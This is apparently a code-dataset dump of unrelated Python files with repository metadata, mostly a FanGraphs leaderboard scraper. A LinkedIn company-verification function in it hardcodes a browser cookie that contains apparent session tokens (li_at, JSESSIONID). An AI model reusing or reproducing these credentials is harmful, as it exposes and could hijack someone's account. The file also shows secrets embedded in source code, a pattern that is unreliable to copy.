| 52.279446 | 275 | 0.690286 | 2,499 | 22,637 | 6.138856 | 0.072029 | 0.100711 | 0.04954 | 0.041718 | 0.841992 | 0.828303 | 0.813506 | 0.785542 | 0.76892 | 0.75132 | 0 | 0.006833 | 0.185449 | 22,637 | 432 | 276 | 52.400463 | 0.825153 | 0 | 0 | 0.692893 | 0 | 0 | 0.076026 | 0.00243 | 0 | 0 | 0 | 0 | 0.299492 | 1 | 0.088832 | false | 0.010152 | 0.038071 | 0.005076 | 0.142132 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9c87085397e4cebb4a2b5cf79eab231a90f6c118 | 25 | py | Python | tests.py | TypeGenie/TypeGenieAPIClient | 636ba9d34d46d469d3ff1e61dd177d4adac027f9 | [
"MIT"
] | 2 | 2021-05-27T05:32:57.000Z | 2022-03-29T23:06:06.000Z | test.py | resurfaceio/test-spark-heroku | 983582c10070299190c7763ba1a9aba4fa3ebfa3 | [
"MIT"
] | 9 | 2019-11-16T07:23:21.000Z | 2020-06-17T17:52:54.000Z | test.py | resurfaceio/test-apollo-heroku | 5d03779d48cd1b3f0519597e33b81f6404bdc00a | [
"MIT"
] | 1 | 2021-06-10T18:38:16.000Z | 2021-06-10T18:38:16.000Z | print("Running tests...") | 25 | 25 | 0.68 | 3 | 25 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 25 | 1 | 25 | 25 | 0.708333 | 0 | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
9cddeb8d50c34594bf7f91653aa2cf114d0212c3 | 25 | py | Python | mathx/ode/__init__.py | draustin/matseq | 16765c7c54e8ed80417b2502f1f5ef8c7640a2da | [
"MIT"
] | null | null | null | mathx/ode/__init__.py | draustin/matseq | 16765c7c54e8ed80417b2502f1f5ef8c7640a2da | [
"MIT"
] | 1 | 2020-04-03T04:15:54.000Z | 2020-04-03T04:15:54.000Z | mathx/ode/__init__.py | draustin/matseq | 16765c7c54e8ed80417b2502f1f5ef8c7640a2da | [
"MIT"
] | 2 | 2020-06-23T03:16:01.000Z | 2020-06-23T06:30:30.000Z | from . import drive, rk45 | 25 | 25 | 0.76 | 4 | 25 | 4.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 0.16 | 25 | 1 | 25 | 25 | 0.809524 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9ceabd962c75cd4336c8ed6b557a2486a76a19ce | 3,406 | py | Python | api/utils/company_profile_verifier.py | NoisyBotDude/MIS-Backend | fa402b0a6d5d6862634b0ed55bc57178856c1eba | [
"MIT"
] | 1 | 2022-03-28T06:13:11.000Z | 2022-03-28T06:13:11.000Z | api/utils/company_profile_verifier.py | NoisyBotDude/MIS-Backend | fa402b0a6d5d6862634b0ed55bc57178856c1eba | [
"MIT"
] | 1 | 2021-12-21T13:59:47.000Z | 2021-12-21T13:59:47.000Z | api/utils/company_profile_verifier.py | NoisyBotDude/MIS-Backend | fa402b0a6d5d6862634b0ed55bc57178856c1eba | [
"MIT"
] | 10 | 2021-12-24T18:08:57.000Z | 2022-03-18T13:18:25.000Z | import requests
def validate_company_profile(company):
"""Validates compnay name
Criteria:
-> Company should have it's own page on LinkedIn
"""
company = company.replace(' ','').lower()
url = f"https://www.linkedin.com/company/{company}"
payload={}
headers = {
'authority': 'www.linkedin.com',
'method': 'GET',
'path': '/company/verizon/',
'scheme': 'https',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9',
'accept-encoding': 'gzip, deflate, br',
'accept-language': 'en-US,en;q=0.9',
'cache-control': 'max-age=0',
'cookie': 'li_sugr=a9ec4480-7d0c-4845-95e7-39605d64191e; bcookie="v=2&8aaee4d9-dae2-4557-8982-764a1c4d8220"; bscookie="v=1&2022011215585042776796-5cc9-45a6-8cc5-81319174ccc1AQE_17iC6_72LTD8_p-00jJCspROFjDQ"; lang=v=2&lang=en-us; _gcl_au=1.1.417085013.1642018060; AMCVS_14215E3D5995C57C0A495C55%40AdobeOrg=1; aam_uuid=15799541411558395992045813087850080675; li_rm=AQFw0wobjO2NlAAAAX5P55PV9VBojDJkqKhl_YRquLswhB18wxW5CrzlKEbyd4a5Pkzg4sK4titxilH1vTM4uvdtNP51lhhdj3SPrI211t6J-s-eGf37cdyS; li_at=AQEDASpjhLADRqWwAAABfk_nnOUAAAF-c_Qg5U4Avoa3chQYq0gbZXsytq09SlpZZBggeNaQsXJ02AQ5fAJyV5Yq9vn0rTQoAszAKcsdg6bsVo-UHJcwisQGyxpLp3mVYESTXOa5hPbmf6Ba5Hr6g389; liap=true; JSESSIONID="ajax:8815064273025167449"; timezone=Asia/Calcutta; _guid=271bb573-1864-4058-8892-8bd0c8593a8d; AnalyticsSyncHistory=AQK2_sag26JQDQAAAX5P561HnSsDCdtE74-2dCE4vAO3tTg5oP08xO1DW6TitJ7n2Ipoaqxx28Rp0e9i3psPlw; lms_ads=AQGJAFOpD7Ij8gAAAX5P56_xR2RnnpHvzV7PrTt1XFYLLXOfaxm1c1IMWHrXs3fIiVy_5jZxQFCG_Pndonz85bkJkm3flnGG; lms_analytics=AQGJAFOpD7Ij8gAAAX5P56_xR2RnnpHvzV7PrTt1XFYLLXOfaxm1c1IMWHrXs3fIiVy_5jZxQFCG_Pndonz85bkJkm3flnGG; AMCV_14215E3D5995C57C0A495C55%40AdobeOrg=-637568504%7CMCIDTS%7C19005%7CMCMID%7C15228333244831983722065779036496648808%7CMCAAMLH-1642622895%7C12%7CMCAAMB-1642622895%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1642025295s%7CNONE%7CvVersion%7C5.1.1%7CMCCIDH%7C1805256044; pushPermState=default; UserMatchHistory=AQLX2VHUilNAGwAAAX5P7lNyoyxI9B84M8tf13u_SiN_IALpIUauE4yazo3Yufm_9LPkgAVn5VKMyMyhVUnY--bfSKzs3qsmM5rpP8p3d5--TLfiH1L7Yyr2FR2_AMrXURSzCgljGCNQXLQWtVy-yCYWZDkMD2IUaQP3HgVRVeioZkFsv46lBt_dzTqC5klUJUnRP7ywn60Zf_rLko6RJC-roHh9Zm87U4CXLndy15uCcrxDZtWj19oTx_C0U1qlOtZfZVieqKpd3n5WXCofxwi6EUbA_NQ2y5onENU; lidc="b=TB04:s=T:r=T:a=T:p=T:g=3867:u=732:x=1:i=1642018527:t=1642019932:v=2:sig=AQHV6hl79LViOd9L81EeA8aNCM1Ux1vn"; bcookie="v=2&fea97cf7-1aaf-4164-84b4-c7d2286b72bd"; lidc="b=TB04:s=T:r=T:a=T:p=T:g=3867:u=732:x=1:i=1642018814:t=1642019932:v=2:sig=AQG-TOHFdLb9PiOMqYMs9mRF2YMb0JDF"',
'sec-fetch-mode': 'navigate',
'sec-fetch-site': 'same-origin',
'sec-fetch-user': '?1',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Mobile Safari/537.36'
}
response = requests.request("GET", url, headers=headers, data=payload).status_code
if response != 200:
# TODO: Send a notification to the admin
raise ValueError(f"{company} company is not verified.")
return company | 100.176471 | 2,012 | 0.758661 | 355 | 3,406 | 7.177465 | 0.68169 | 0.003925 | 0.003532 | 0.072998 | 0.035322 | 0.022763 | 0.022763 | 0.022763 | 0.022763 | 0.022763 | 0 | 0.213087 | 0.125073 | 3,406 | 34 | 2,013 | 100.176471 | 0.641946 | 0.0367 | 0 | 0 | 0 | 0.12 | 0.799877 | 0.645698 | 0 | 0 | 0 | 0.029412 | 0 | 1 | 0.04 | false | 0 | 0.04 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9cf4a121a4521a2aa51bf3e72902832d7294e519 | 130 | py | Python | ros/src/utils/utils.py | aimuch/CarND-Capstone | 69bed842607b5ef59d0673551974889bc68af9c3 | [
"MIT"
] | null | null | null | ros/src/utils/utils.py | aimuch/CarND-Capstone | 69bed842607b5ef59d0673551974889bc68af9c3 | [
"MIT"
] | null | null | null | ros/src/utils/utils.py | aimuch/CarND-Capstone | 69bed842607b5ef59d0673551974889bc68af9c3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import math
# Euclidean distance.
def dist(x1, x2, y1, y2):
return math.sqrt((x1-x2)**2 + (y1-y2)**2)
| 16.25 | 45 | 0.623077 | 23 | 130 | 3.521739 | 0.73913 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092593 | 0.169231 | 130 | 7 | 46 | 18.571429 | 0.657407 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
9cfb2e1985aea3e5193ee96f719bb8c8df4fd240 | 32,843 | py | Python | fangraphs/leaders/leaders.py | JLpython-py/FanGraphs-Export | f2b3ffcd91275f92e50c173a7e94919e2a1c291d | [
"MIT"
] | 10 | 2021-03-02T03:18:55.000Z | 2022-03-21T07:50:21.000Z | fangraphs/leaders/leaders.py | JLpython-py/FanGraphs-Export | f2b3ffcd91275f92e50c173a7e94919e2a1c291d | [
"MIT"
] | 20 | 2021-03-03T22:21:23.000Z | 2021-09-02T16:57:49.000Z | fangraphs/leaders/leaders.py | JLpython-py/FanGraphs-Export | f2b3ffcd91275f92e50c173a7e94919e2a1c291d | [
"MIT"
] | 1 | 2022-01-18T11:48:07.000Z | 2022-01-18T11:48:07.000Z | #! python3
# FanGraphs/leaders/leaders.py
"""
Scraper for the webpages under the FanGraphs **Leaders** tab.
"""
import csv
import datetime
import os
import fangraphs.exceptions
from fangraphs.leaders import ScrapingUtilities
from fangraphs import selectors
from fangraphs.selectors import leaders_sel
class GameSpan(ScrapingUtilities):
"""
Scraper for the FanGraphs `60-Game Span Leaderboards`_ page.
.. _60-Game Span Leaderboards: https://www.fangraphs.com/leaders/special/60-game-span
"""
__selections = {}
__dropdowns = {}
__waitfor = leaders_sel.GameSpan.waitfor
address = "https://fangraphs.com/leaders/special/60-game-span"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.GameSpan.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel)
)
for cat, sel in leaders_sel.GameSpan.dropdowns.items():
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> div > a")
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__selections))
queries.extend(list(cls.__dropdowns))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
options = self.__selections[query].list_options()
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently set to.
:param query: The filter query being retrieved of its current option
:return: The option which the filter query is currently set to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
option = self.__selections[query].current_option()
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=3)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
self._close_ad()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
self._refresh_parser()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data(".data-export", path)
class International(ScrapingUtilities):
"""
Scraper for the FanGraphs `KBO Leaderboards`_ page.
.. _KBO Leaderboards: https://www.fangraphs.com/leaders/international
"""
__selections = {}
__dropdowns = {}
__switches = {}
__waitfor = leaders_sel.International.waitfor
address = "https://www.fangraphs.com/leaders/international"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.International.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel)
)
for cat, sel in leaders_sel.International.dropdowns.items():
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> div > a")
)
for cat, sel in leaders_sel.International.switches.items():
self.__switches.setdefault(
cat, selectors.Switches(self.soup, sel)
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(cls.__selections)
queries.extend(cls.__dropdowns)
queries.extend(cls.__switches)
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
options = self.__selections[query].list_options()
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
elif query in self.__switches:
options = ["True", "False"]
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
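The selections/dropdowns/switches dispatch used by ``list_options`` (and repeated across every scraper class in this module) can be sketched generically. The dictionary contents below are hypothetical stand-ins, and ``KeyError`` stands in for ``fangraphs.exceptions.InvalidFilterQuery``:

```python
def list_options_for(query, selections, dropdowns, switches):
    # Generic version of the dispatch in list_options(): each
    # filter class resolves its options differently, and switches
    # are always boolean.
    query = query.lower()
    if query in selections:
        return selections[query]
    if query in dropdowns:
        return dropdowns[query]
    if query in switches:
        return ["True", "False"]
    raise KeyError(query)  # stands in for InvalidFilterQuery

print(list_options_for("Stat", {"stat": ["Batting", "Pitching"]}, {}, {}))
```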
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently set to.
:param query: The filter query being retrieved of its current option
:return: The option which the filter query is currently set to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
option = self.__selections[query].current_option()
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=3)
elif query in self.__switches:
option = "True" if ",to" in self.page.url else "False"
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
self._close_ad()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
elif query in self.__switches:
options = [o.lower() for o in self.list_options(query)]
if option.lower() not in options:
raise fangraphs.exceptions.InvalidFilterOption(option)
if option.title() == self.current_option(query):
return
self.page.click(self.__switches[query])
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
self._refresh_parser()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data(".data-export", path)
class MajorLeague(ScrapingUtilities):
"""
Scraper for the FanGraphs `Major League Leaderboards`_ page.
Note that the Splits Leaderboard is not covered.
Instead, it is covered by :py:class:`SplitsLeaderboards`.
.. _Major League Leaderboards: https://fangraphs.com/leaders.aspx
"""
__selections = {}
__dropdowns = {}
__switches = {}
__buttons = leaders_sel.MajorLeague.buttons
address = "https://fangraphs.com/leaders.aspx"
def __init__(self):
super().__init__(self.address, waitfor="")
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.MajorLeague.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel, "> div > ul > li")
)
for cat, sel in leaders_sel.MajorLeague.dropdowns.items():
options = leaders_sel.MajorLeague.dropdown_options[cat]
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> div > ul > li", options)
)
for cat, sel in leaders_sel.MajorLeague.switches.items():
self.__switches.setdefault(
cat, selectors.Switches(self.soup, sel)
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__selections))
queries.extend(list(cls.__dropdowns))
queries.extend(list(cls.__switches))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__switches:
options = ["True", "False"]
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
elif query in self.__selections:
options = self.__selections[query].list_options()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently set to.
:param query: The filter query being retrieved of its current option
:return: The option which the filter query is currently set to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__switches:
option = self.__switches[query].current_option(opt_type=1)
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=1)
elif query in self.__selections:
option = self.__selections[query].current_option()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str, *, autoupdate=True):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:param autoupdate: If ``True``, any buttons attached to the filter query will be clicked
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query, option = query.lower(), str(option).lower()
self._close_ad()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
elif query in self.__switches:
options = [o.lower() for o in self.list_options(query)]
if option.lower() not in options:
raise fangraphs.exceptions.InvalidFilterOption(option)
if option != self.current_option(query).lower():
self.page.click(self.__switches[query])
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
if query in self.__buttons and autoupdate:
self.page.click(self.__buttons[query])
self._refresh_parser()
def export(self, path=""):
"""
Uses the **Export Data** button on the webpage to export the current leaderboard.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *./out/%d.%m.%y %H.%M.%S.csv*
:param path: The path to save the exported data to
"""
self.export_data("#LeaderBoard1_cmdCSV", path)
class SeasonStat(ScrapingUtilities):
"""
Scraper for the FanGraphs `Season Stat Grid`_ page.
.. _Season Stat Grid: https://fangraphs.com/leaders/season-stat-grid
"""
__selections = {}
__dropdowns = {}
__waitfor = leaders_sel.SeasonStat.waitfor
address = "https://fangraphs.com/leaders/season-stat-grid"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.SeasonStat.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel)
)
for cat, sel in leaders_sel.SeasonStat.dropdowns.items():
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> ul > li")
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__selections))
queries.extend(list(cls.__dropdowns))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Argument ``query`` is invalid
"""
query = query.lower()
if query in self.__selections:
options = self.__selections[query].list_options()
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option which a filter query is currently configured to.
:param query: The filter query
:return: The option which the filter query is currently configured to
:rtype: str
:raises FanGraphs.exceptions.InvalidFilterQuery: Argument ``query`` is invalid
"""
query = query.lower()
if query in self.__selections:
option = self.__selections[query].current_option()
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=2)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str):
"""
Configures a filter query to a specified option.
:param query: The filter query
:param option: The option to configure ``query`` to
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
self._close_ad()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
self._refresh_parser()
def _write_table_headers(self, writer: csv.writer):
"""
Writes the headers of the data table to the CSV file.
:param writer: The ``csv.writer`` object
"""
elems = self.soup.select(".table-scroll thead tr th")
headers = [e.getText() for e in elems]
writer.writerow(headers)
def _write_table_rows(self, writer: csv.writer):
"""
Iterates through the rows of the current data table.
The data in each row is written to the CSV file.
:param writer: The ``csv.writer`` object
"""
row_elems = self.soup.select(".table-scroll tbody tr")
for row in row_elems:
elems = row.select("td")
items = [e.getText() for e in elems]
writer.writerow(items)
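The manual-export path implemented by ``_write_table_headers`` and ``_write_table_rows`` reduces to writing lists of cell text with ``csv.writer``. A minimal, self-contained sketch — the header and row values are hypothetical stand-ins for the text pulled from the parsed ``<th>``/``<td>`` elements:

```python
import csv
import io

# Hypothetical values standing in for the parsed cell text.
headers = ["Name", "Team", "WAR"]
rows = [["Player A", "SEA", "5.1"], ["Player B", "TOR", "4.8"]]

buf = io.StringIO()
writer = csv.writer(buf)
writer.writerow(headers)   # mirrors _write_table_headers
writer.writerows(rows)     # mirrors _write_table_rows for one page
print(buf.getvalue().strip())
```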
def export(self, path=""):
"""
Scrapes and saves the data from the table of the current leaderboards.
The data will be exported as a CSV file and the file will be saved to *out/*.
The file will be saved to the filepath ``path``, if specified.
Otherwise, the file will be saved to the filepath *out/%d.%m.%y %H.%M.%S.csv*.
*Note: This is a 'manual' export of the data.
In other words, the data is scraped from the table.
This is unlike other forms of export where a button is clicked.
Thus, there will be no record of a download when the data is exported.*
:param path: The path to save the exported file to
"""
self._close_ad()
if not path or os.path.splitext(path)[1] != ".csv":
path = "out/{}.csv".format(
datetime.datetime.now().strftime("%d.%m.%y %H.%M.%S")
)
total_pages = int(
self.soup.select(
".table-page-control:nth-last-child(1) > .table-control-total"
)[0].getText()
)
with open(path, "w", newline="") as file:
writer = csv.writer(file)
self._write_table_headers(writer)
for _ in range(0, total_pages):
self._write_table_rows(writer)
self.page.click(
".table-page-control:nth-last-child(1) > .next"
)
self._refresh_parser()
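The default-path branch of ``export`` above can be exercised on its own. This hedged sketch reproduces the timestamped *out/* naming; ``default_export_path`` is a hypothetical helper that mirrors the ``os.path.splitext`` guard in the method:

```python
import datetime
import os.path

def default_export_path(path=""):
    # Mirrors the guard in export(): fall back to a timestamped
    # filename under out/ when no .csv path was supplied.
    if not path or os.path.splitext(path)[1] != ".csv":
        path = "out/{}.csv".format(
            datetime.datetime.now().strftime("%d.%m.%y %H.%M.%S")
        )
    return path

print(default_export_path("stats.csv"))  # an explicit .csv path is kept
```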
class Splits(ScrapingUtilities):
"""
Scraper for the FanGraphs `Splits Leaderboards`_ page.
.. _Splits Leaderboards: https://fangraphs.com/leaders/splits-leaderboards
"""
__selections = {}
__dropdowns = {}
__splits = {}
__quick_splits = leaders_sel.Splits.quick_splits
__switches = {}
__waitfor = leaders_sel.Splits.waitfor
address = "https://fangraphs.com/leaders/splits-leaderboards"
def __init__(self):
super().__init__(self.address, waitfor=self.__waitfor)
def __enter__(self):
self._browser_init()
self.reset()
self.__compile_selectors()
self.set_filter_group("Show All")
self.configure("auto_pt", "False", autoupdate=True)
return self
def __exit__(self, exc_type, value, traceback):
self.quit()
def __compile_selectors(self):
for cat, sel in leaders_sel.Splits.selections.items():
self.__selections.setdefault(
cat, selectors.Selections(self.soup, sel)
)
for cat, sel in leaders_sel.Splits.dropdowns.items():
self.__dropdowns.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> ul > li")
)
for cat, sel in leaders_sel.Splits.splits.items():
self.__splits.setdefault(
cat, selectors.Dropdowns(self.soup, sel, "> ul > li")
)
for cat, sel in leaders_sel.Splits.switches.items():
self.__switches.setdefault(
cat, selectors.Switches(self.soup, sel)
)
@classmethod
def list_queries(cls):
"""
Lists the possible filter queries which can be used to modify search results.
:return: Filter queries which can be used to modify search results
:rtype: list
"""
queries = []
queries.extend(list(cls.__selections))
queries.extend(list(cls.__dropdowns))
queries.extend(list(cls.__splits))
queries.extend(list(cls.__switches))
return queries
def list_options(self, query: str):
"""
Lists the possible options which a filter query can be configured to.
:param query: The filter query
:return: Options which the filter query can be configured to
:rtype: list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
options = self.__selections[query].list_options()
elif query in self.__dropdowns:
options = self.__dropdowns[query].list_options()
elif query in self.__splits:
options = self.__splits[query].list_options()
elif query in self.__switches:
options = ["True", "False"]
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return options
def current_option(self, query: str):
"""
Retrieves the option(s) which a filter query is currently set to.
Most dropdown- and split-class filter queries can be configured to multiple options.
For those filter classes, a list is returned, while other filter classes return a string.
- Selection-class: ``str``
- Dropdown-class: ``list``
- Split-class: ``list``
- Switch-class: ``str``
:param query: The filter query being retrieved of its current option
:return: The option(s) which the filter query is currently set to
:rtype: str or list
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
query = query.lower()
if query in self.__selections:
option = self.__selections[query].current_option()
elif query in self.__dropdowns:
option = self.__dropdowns[query].current_option(opt_type=2, multiple=True)
elif query in self.__splits:
option = self.__splits[query].current_option(opt_type=2, multiple=True)
elif query in self.__switches:
option = self.__switches[query].current_option(opt_type=2)
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
return option
def configure(self, query: str, option: str, *, autoupdate=False):
"""
Configures a filter query to a specified option.
:param query: The filter query to be configured
:param option: The option to set the filter query to
:param autoupdate: If ``True``, :py:meth:`update` will be called following configuration
:raises FanGraphs.exceptions.InvalidFilterQuery: Invalid argument ``query``
"""
self._close_ad()
query = query.lower()
if query in self.__selections:
self.__selections[query].configure(self.page, option)
elif query in self.__dropdowns:
self.__dropdowns[query].configure(self.page, option)
elif query in self.__splits:
self.__splits[query].configure(self.page, option)
elif query in self.__switches:
options = [o.lower() for o in self.list_options(query)]
if option.lower() not in options:
raise fangraphs.exceptions.InvalidFilterOption(option)
if option != self.current_option(query)[0].title():
self.page.click(self.__switches[query])
else:
raise fangraphs.exceptions.InvalidFilterQuery(query)
if autoupdate:
self.update()
self._refresh_parser()
def update(self):
